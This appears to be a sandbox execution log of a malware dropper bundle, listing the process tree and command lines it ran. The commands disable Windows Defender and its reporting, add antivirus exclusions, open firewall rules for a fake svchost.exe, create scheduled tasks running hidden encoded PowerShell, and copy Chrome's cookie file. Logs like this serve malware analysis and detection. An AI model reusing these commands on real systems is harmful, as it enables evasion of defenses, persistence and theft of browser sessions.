C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:5152
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:5980
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:6052
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:6032
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵PID:6100
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵PID:5204
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵PID:5412
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵PID:6104
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵PID:4736
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵PID:2860
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWQSZAlZZ" /SC once /ST 00:11:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:5628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWQSZAlZZ"9⤵PID:4448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWQSZAlZZ"9⤵PID:4744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "brIuwqybiEKAwdpiwj" /SC once /ST 00:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WUUWFJqnKFeOpXCaR\eeNammEZxjaGeaJ\twLMTLb.exe\" AP /site_id 525403 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:5832
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\r9DMnfO48zyarr1eSE05LKzv.exe"C:\Users\Admin\Pictures\Adobe Films\r9DMnfO48zyarr1eSE05LKzv.exe"6⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:1972
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D2Qp411Ip8Z8_YULGOLDIuxE.exe"C:\Users\Admin\Pictures\Adobe Films\D2Qp411Ip8Z8_YULGOLDIuxE.exe"6⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\famX9DdWO4X74\EasyCalc License Agreement.exe"C:\Users\Admin\AppData\Local\Temp\famX9DdWO4X74\EasyCalc License Agreement.exe"7⤵PID:5528
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oiMnaMCq7Lm7jKcpXTWF7BNM.exe"C:\Users\Admin\Pictures\Adobe Films\oiMnaMCq7Lm7jKcpXTWF7BNM.exe"6⤵PID:5392
-
-
C:\Users\Admin\Pictures\Adobe Films\tbORYp8muUpVGEdITgK3MR5G.exe"C:\Users\Admin\Pictures\Adobe Films\tbORYp8muUpVGEdITgK3MR5G.exe"6⤵PID:5428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 4007⤵
- Program crash
PID:5908
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"6⤵PID:5480
-
C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"7⤵PID:6108
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2x2ks0IMQgbM_mfoS1XyMUyX.exe"C:\Users\Admin\Pictures\Adobe Films\2x2ks0IMQgbM_mfoS1XyMUyX.exe"6⤵PID:5456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 4007⤵
- Program crash
PID:5916
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pByBOI1Ghz2wjskbQr3OjHjA.exe"C:\Users\Admin\Pictures\Adobe Films\pByBOI1Ghz2wjskbQr3OjHjA.exe"6⤵PID:5540
-
-
C:\Users\Admin\Pictures\Adobe Films\vSZDGJfcSXqtsZ10Kd1r8z8e.exe"C:\Users\Admin\Pictures\Adobe Films\vSZDGJfcSXqtsZ10Kd1r8z8e.exe"6⤵PID:5644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:5336
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5944
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:4248
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:2600
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:4664
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nPgwknobT1e80SNU9uwUZkW3.exe"C:\Users\Admin\Pictures\Adobe Films\nPgwknobT1e80SNU9uwUZkW3.exe"6⤵PID:5580
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0550507893048c.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05c25ad4f6fe4.exe4⤵PID:1244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05cac54300eb.exe4⤵PID:2492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri059521701074cbcde.exe4⤵PID:2480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0519054cecb36fc1b.exe4⤵PID:1604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri058313bd59e.exe4⤵PID:3260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri058313bd59e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri058313bd59e.exe" -u1⤵PID:5060
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",1⤵PID:2896
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",2⤵PID:2324
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",3⤵PID:2260
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe"C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe" /SILENT1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\is-ONRNR.tmp\Fri05e80376d7965136.tmp"C:\Users\Admin\AppData\Local\Temp\is-ONRNR.tmp\Fri05e80376d7965136.tmp" /SL5="$20202,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe" /SILENT2⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\is-OKQDM.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-OKQDM.tmp\windllhost.exe" 773⤵PID:2504
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05c25ad4f6fe4.exeC:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05c25ad4f6fe4.exe1⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573351d0136.exeC:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573351d0136.exe1⤵PID:1872
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"1⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\mystnnewfile.exe"C:\Users\Admin\AppData\Local\Temp\mystnnewfile.exe"2⤵PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"2⤵PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\compan.exe"C:\Users\Admin\AppData\Local\Temp\compan.exe"2⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\Skype.exeC:\Users\Admin\AppData\Local\Temp\Skype.exe3⤵PID:3916
-
-
-
C:\Users\Admin\AppData\Local\Temp\RobCleanerInstll31828.exe"C:\Users\Admin\AppData\Local\Temp\RobCleanerInstll31828.exe"2⤵PID:4288
-
C:\Users\Admin\AppData\Local\7c5832ae-0a76-4fe3-94c7-2764cb0ce5b5.exe"C:\Users\Admin\AppData\Local\7c5832ae-0a76-4fe3-94c7-2764cb0ce5b5.exe"3⤵
- Executes dropped EXE
PID:2484
-
-
C:\Users\Admin\AppData\Local\b833b94a-993e-4b3b-8471-d11c0968483b.exe"C:\Users\Admin\AppData\Local\b833b94a-993e-4b3b-8471-d11c0968483b.exe"3⤵PID:4212
-
-
C:\Users\Admin\AppData\Local\ce25f743-2ca1-47b7-b499-837a5deaaeab.exe"C:\Users\Admin\AppData\Local\ce25f743-2ca1-47b7-b499-837a5deaaeab.exe"3⤵PID:2680
-
-
C:\Users\Admin\AppData\Local\b00766f6-af54-4d3d-b337-cadc85817024.exe"C:\Users\Admin\AppData\Local\b00766f6-af54-4d3d-b337-cadc85817024.exe"3⤵PID:3588
-
C:\Users\Admin\AppData\Roaming\5718271.exe"C:\Users\Admin\AppData\Roaming\5718271.exe"4⤵PID:4384
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",5⤵PID:1964
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",6⤵PID:3336
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",7⤵PID:2364
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",8⤵PID:5204
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\3b8f80a4-e9d1-4f29-99cb-d45b6424556b.exe"C:\Users\Admin\AppData\Local\3b8f80a4-e9d1-4f29-99cb-d45b6424556b.exe"3⤵PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri059521701074cbcde.exeFri059521701074cbcde.exe1⤵
- Executes dropped EXE
PID:3860
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05cac54300eb.exeFri05cac54300eb.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:5116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:1228
-
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵PID:2180
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri0510f5b933f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0510f5b933f.exe" & exit1⤵PID:5040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fri0510f5b933f.exe" /f2⤵
- Kills process with taskkill
PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0510f5b933f.exeFri0510f5b933f.exe /mixtwo1⤵
- Executes dropped EXE
PID:2660
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0550507893048c.exeFri0550507893048c.exe1⤵
- Executes dropped EXE
PID:2648
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri058313bd59e.exeFri058313bd59e.exe1⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0519054cecb36fc1b.exeFri0519054cecb36fc1b.exe1⤵
- Executes dropped EXE
PID:2468
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05c25ad4f6fe4.exeFri05c25ad4f6fe4.exe1⤵
- Executes dropped EXE
PID:1440
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3960 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5136